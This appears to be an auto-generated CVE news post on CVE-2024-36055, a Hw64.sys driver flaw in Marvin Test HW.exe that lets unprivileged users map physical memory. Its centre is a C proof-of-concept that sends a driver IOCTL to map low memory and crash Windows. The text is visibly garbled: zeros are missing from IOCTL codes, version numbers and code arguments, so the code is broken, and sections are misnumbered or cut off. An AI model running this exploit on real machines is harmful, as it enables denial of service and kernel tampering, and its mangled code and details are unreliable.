CVE CyberSecurity Database News

CVE-2024-36055 - How Unprivileged Users Can Crash Your System via Hw64.sys in Marvin Test HW.exe

Poster -

Recently, a critical vulnerability was discovered in the Hw64.sys driver used by the Marvin Test HW.exe software (before version 5..5.). Tracked as CVE-2024-36055, this flaw allows *any* local user—no admin needed—to map physical memory directly, opening the door to serious issues, including system crashes (aka Blue Screen of Death, or BSOD).

This guide covers what’s vulnerable, how the attack actually works, and demonstrates what an exploit might look like. Everything is explained in plain English.

1. What Is the Vulnerability?

Hw64.sys is a device driver that comes with Marvin Test HW.exe. It exposes several IOCTL commands (including x9c40a4f8, x9c40a4e8, x9c40a4c, x9c40a4c4, and x9c40a4ec), which can be triggered by user-mode code—*yes, even by users without admin rights*.

The problem is that by sending a specially crafted IOCTL request to this driver, you can call the kernel's MmMapIoSpace function, which allows mapping any physical memory you want into your current process. With direct read/write access to physical memory, it’s trivial to crash the OS, potentially overwrite (or read) sensitive information, or disable security features.

2. Original References

- CVE-2024-36055 at NVD
- Marvin Test Solutions Product Download Page
- Exploit Database Entry (if available)

3. Exploitation Details

The vulnerability centers around how the driver exposes the kernel function MmMapIoSpace to anyone who can send the right IOCTL. Let's look at what goes on under the hood.

*(...plus at least 7 more...)*

By sending a device control request with these codes to \\.\Hw64 device, you instruct the driver to map *arbitrary* physical addresses.

Send IOCTL: Call DeviceIoControl with the vulnerable IOCTL and buffer.

4. Access Memory: The driver calls MmMapIoSpace on behalf of the user, mapping the physical memory into your process’s address space.
5. Trigger BSOD: Any ill-formed memory operation can destroy kernel state, crash the machine, or hang it.

4. Example Exploit (Proof-of-Concept)

Here's a *basic* example in C to trigger the bug and crash the system. Never run this on a production PC! Only for educational use in a test environment.

#include <windows.h>
#include <stdio.h>

#define DEVICE_NAME      "\\\\.\\Hw64"
#define IOCTL_MMAP_PHYS  x9c40a4f8

// Structure layout may change; for demo, we just use a dummy buffer.
typedef struct _MMAP_REQUEST {
    ULONG64 PhysAddress;  // Physical address to map
    ULONG   Size;         // Size to map
} MMAP_REQUEST;

int main() {
    HANDLE hDevice = CreateFileA(DEVICE_NAME, GENERIC_READ|GENERIC_WRITE, , NULL, OPEN_EXISTING, , NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device, error %d\n", GetLastError());
        return -1;
    }

    MMAP_REQUEST req = {  };
    req.PhysAddress = x; // Try to map NULL/low memory - dangerous!
    req.Size = x100;     // Map one page

    DWORD returned = ;
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_MMAP_PHYS,
        &req, sizeof(req),
        NULL, ,
        &returned,
        NULL);

    if (!result) {
        printf("DeviceIoControl failed: %d\n", GetLastError());
    } else {
        printf("Request succeeded—system may now be unstable or crash.\n");
    }

    CloseHandle(hDevice);
    return ;
}

*Warning: This code is for research only. Do not run on any system you care about.*

Attackers could use this as part of a larger privilege escalation chain.

- Could be weaponized for ransomware (immediate BSOD) or to bypass basic security tools by tampering with kernel memory.

6. Remediation

Upgrade ASAP:
If you use Marvin Test HW.exe with Hw64.sys, upgrade to version 5..5. or later IMMEDIATELY.

7. Conclusion

CVE-2024-36055 is dangerously simple to exploit. Any process can use Marvin Test's old Hw64.sys to map and manipulate *any part of system memory*. If you're running an affected version, patch now!

Stay safe. Always keep track of driver vulnerabilities—they can open up your whole machine!

Further Reading:
- Microsoft: Understanding mmio mapping
- A quick intro to Windows IOCTLs

*Written exclusively for you, in plain American English. If this helped, share and stay patched!*

Timeline

Published on: 05/26/2024 23:15:21 UTC
Last modified on: 10/30/2024 20:35:20 UTC